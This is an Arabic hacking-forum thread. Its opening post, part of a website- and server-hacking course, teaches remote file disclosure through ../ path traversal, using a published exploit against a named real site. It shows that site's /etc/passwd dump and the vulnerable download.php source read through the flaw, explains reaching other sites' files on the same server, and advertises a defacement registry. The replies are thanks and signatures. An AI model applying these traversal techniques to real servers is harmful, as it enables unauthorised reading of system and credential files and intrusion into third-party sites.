شرح استغلال ثغرات Remote File Disclosure

شرح استغلال ثغرات Remote File Disclosure


النتائج 1 إلى 10 من 10

الموضوع: شرح استغلال ثغرات Remote File Disclosure

  1. #1

    Hasri شرح استغلال ثغرات Remote File Disclosure

    السلام عليكم و رحمة الله وبركاته


    --==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==--
    الدورة التعليمية لاختراق المواقع و السيرفرات مقدمة من طرف
    ASDELY & SCORPION
    --==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==--
    --==/=/=/=/=/=/=========================================/=/=/=/=/=/==--
    شرح استغلال ثغرات Remote File Disclosure
    --==/=/=/=/=/=/=========================================/=/=/=/=/=/==--
    تفيدنا ثغرات Remote File Disclosure في قراءة ملفات حق سرفر الموقع , وبذلك ممكن قراءة ملفات مهمة تفيدنا في الاختراق مثل ملفات /etc/ (passwd , valiases..) كما بامكاننا
    قراءة ملفات اي موقع بالسرفر لكن مع احترام مكانه في السرفر .
    اولا سوف نشرح على ثغرة في سكربت USP FOSS Distribution , رابط الثغرة : http://www.milw0rm.com/exploits/3794
    اوكي سوف امر الى التطبيق مباشرة لان تم شرح كيفية التعامل مع ثغرات الملورم في دروس سابقة
    >>
    ################################################## #################################
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    ................
    ################################################## #################################


    كما لاحضتم تم قراءة محتوى ملف /etc/passwd
    ملاحضة هامة : لقراءة ملف ما وارد بالموقع اللي مصاب بالثغرة (riemann.usp.ac.fj/~uspfoss/ في مثالنا الحالي) يكفي التلاعب بهذه العلامة التي تدل على خطوة الى الوراء : ../
    مثلا نعلم ان الملف download.php وارد عالموقع واريد رأية السرس كود حقه :
    >>
    ################################################## #################################
    <?php
    // <!--sphider_noindex-->
    $file = @$_GET['dnld'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/force-download');
    header('Content-Length: ' . filesize($file));
    header('Content-Disposition: attachment; filename=' . basename($file));
    readfile($file);
    // <!--/sphider_noindex-->
    ?>
    ################################################## #################################
    >>
    ملاحضة : لو اردنا قراءة ملف حق موقع اخر بالسرفر يكفي التلاعب بهذه العلامات ../../../../../../ لكن مع احترام المسار اللي حصلنا عليها عند قراءة ملف /etc/passwd
    انتهى الشرح
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  2. #2

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    يعطيك الف عافيه على الشرررررح

  3. #3
    :: مشرف عام :: Aljyyosh Team الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure


    I love Yemen




  4. #4

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    مشكور كتير على الشرح الجيد



    تحياتي لك
    [img2]http://www10.0zz0.com/2009/09/14/09/109461436.jpg[/img2]

  5. #5
    هكر مجتهد
    تاريخ التسجيل
    Oct 2009
    الدولة
    مسوي معسكر في منتدى جيوش الهكرز
    المشاركات
    273

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    يعطيك آلف عافيه يالغلا
    تقبل مروري المتوآضع


    ،
    للتوآصل
    ،

  6. #6
    هكر مبتديء
    تاريخ التسجيل
    Nov 2009
    الدولة
    الجزائر قلبي وغزة نبضه
    المشاركات
    17

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    الشرح صعب قليلا

  7. #7
    هكر نشيط الصورة الرمزية جندي اول للهكر
    تاريخ التسجيل
    Aug 2009
    الدولة
    البلاد المظلمه >الجيوش<
    المشاركات
    108

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    والله كبير والله والله والله كبير والله

  8. #8

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    مشكور كتير على الشرح الجيد

  9. #9
    هكر مجتهد الصورة الرمزية رمز الهكر
    تاريخ التسجيل
    Mar 2011
    الدولة
    الســــــــــــــعوديـــــــــــــــــــــــة
    المشاركات
    258

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    مشكور يا غالي كفيت وفيت
    ‘ الـذيـب يـد‘رع بالـ‘غـنـم ولآ يـ‘حـسـب ح‘ـسـآبهـآ
    رمز الهكر << == صحيح مجرم بس مسلم


    منظمة php


    شي مايبيله دراسه . . رمز الهكر لاتحط راسك براسه .............

  10. #10

    افتراضي رد: شرح استغلال ثغرات Remote File Disclosure

    مشكور ع الجهد البذول منك يا اخي الكريم
    مراقبا للمنتدى في غياب ... المراقب
    ومشرفنا للمنتدى في غياب ... المشرف
    هذا المنتدى منكم .... واليكم
    نتشرف بخدمتكم
    للتواصل والاستفسار
    على البروفايل


المواضيع المتشابهه

  1. شرح استغلال ثغرات remote file include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 89
    آخر مشاركة: 05-11-2012, 04:32 PM
  2. كيفيه اكتشاف ثغرات Remote File Inclusion
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 43
    آخر مشاركة: 03-16-2012, 09:16 PM
  3. كيفيه اكتشاف ثغرات Remote File Disclosure
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 24
    آخر مشاركة: 03-16-2012, 09:07 PM
  4. استغلال ثغرات file upload
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 68
    آخر مشاركة: 09-18-2011, 07:13 PM
  5. شرح استغلال ثغرات remote file disclousure
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 22
    آخر مشاركة: 08-31-2011, 07:25 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •